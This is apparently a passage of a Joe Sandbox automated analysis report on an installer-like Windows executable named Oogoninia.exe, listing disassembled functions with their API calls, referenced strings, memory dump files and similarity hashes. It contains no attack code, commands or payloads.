                                                                                                                                                                                    • API String ID: 530164218-3960258653
                                                                                                                                                                                    • Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                                                                                                                                    • Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
                                                                                                                                                                                    Function 00405812 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00409014), ref: 00405832
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                    • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                    • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                                                                                                                                                    Function 004058AB Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 004058BE
                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 004058D2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                    • API String ID: 3213498283-3404278061
                                                                                                                                                                                    • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                    • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                                                                                                                                                    Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402CC7
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                                                                                                                                    • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                                                                                                                                                    • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                                                                                                                                                    Function 00404F2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00404F5C
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                                                                                                                                                      • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                                                                                                                    • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
                                                                                                                                                                                    Function 00405531 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405567
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Error launching installer, xrefs: 00405544
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                    • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                                                                                                                                    • Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
                                                                                                                                                                                    Function 0040368B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,766B3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
                                                                                                                                                                                    • GlobalFree.KERNEL32(008B7410), ref: 004036AC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 1100898210-3355392842
                                                                                                                                                                                    • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                                                                                                                                    • Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
                                                                                                                                                                                    Function 00405859 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 0040585F
                                                                                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 0040586D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                    • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                    • Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
                                                                                                                                                                                    Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                    • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                    Function 00405978 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
